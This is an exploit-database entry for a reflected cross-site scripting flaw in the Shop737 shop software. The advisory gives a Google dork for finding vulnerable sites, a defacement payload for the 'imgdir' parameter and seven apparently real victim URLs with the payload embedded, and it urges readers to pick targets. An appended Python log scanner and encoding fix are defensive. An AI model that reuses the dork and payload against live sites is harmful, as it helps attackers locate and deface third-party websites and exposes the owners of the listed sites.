Shop737/Cross Site Scripting(XSS)

2015.11.14
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

########################################################
# Exploit Title: Shop737/Cross Site Scripting(XSS)
########################################################
# Google Dork: inurl:"poto" intext:"powered by Shop737"
# Date: [14/11/2015]
# Exploit Author: Guardiran Security Team =>DeMoN
# Vendor Homepage: [http://www.shop737.com/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DESCRIPTION: Hello Guys.
# That sites Have XSS Or Cross Site Scripting Bug.
# Please Enter Dork In Google And Open Your Target.
# Then add This Script
# ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>]
# In Target after This Section
# [index.php?imgdir=]
# Then You See That Your Script Accomplished.
# GooD LucK
########################################################
# Demo:
# http://www.pasirindo.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://susu-bubuk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://bestbeachbunXgalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.ptskk.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.goholidaXy-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.kristalXbohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN
########################################################
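
A defender-side check for the request pattern this advisory describes, added here as an example that is not part of the original advisory: it scans web access logs for requests to `index.php` whose `imgdir` parameter decodes to HTML metacharacters. The log lines are constructed samples in combined log format, and the function names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Characters that let a value break out of a quoted HTML attribute or open a tag.
HTML_META = re.compile(r'[<>"\']')
# Request line inside an access-log entry: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Nov/2015:10:00:00 +0000] "GET /poto/index.php?imgdir=summer2015 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [14/Nov/2015:10:01:12 +0000] "GET /poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3Etest%3C/h1%3E%3C/marquee%3E HTTP/1.1" 200 5342',
    '203.0.113.9 - - [14/Nov/2015:10:01:40 +0000] "GET /poto/index.php?imgdir=%2522%253Eprobe HTTP/1.1" 200 5201',
]

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2522) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_imgdir(log_line):
    """Return the decoded imgdir value if it carries HTML metacharacters, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not target.path.endswith("/index.php"):
        return None
    # parse_qsl performs the first round of percent-decoding.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == "imgdir":
            value = decode_fully(value)
            if HTML_META.search(value):
                return value
    return None

def scan(lines):
    """Return (1-based line number, decoded value) for every flagged entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_imgdir(line)
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: imgdir={value!r}")
```

A hit only shows that such a request was received; the application-side fix is to HTML-encode `imgdir` before it is written into the page.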



Copyright 2024, cxsecurity.com

 
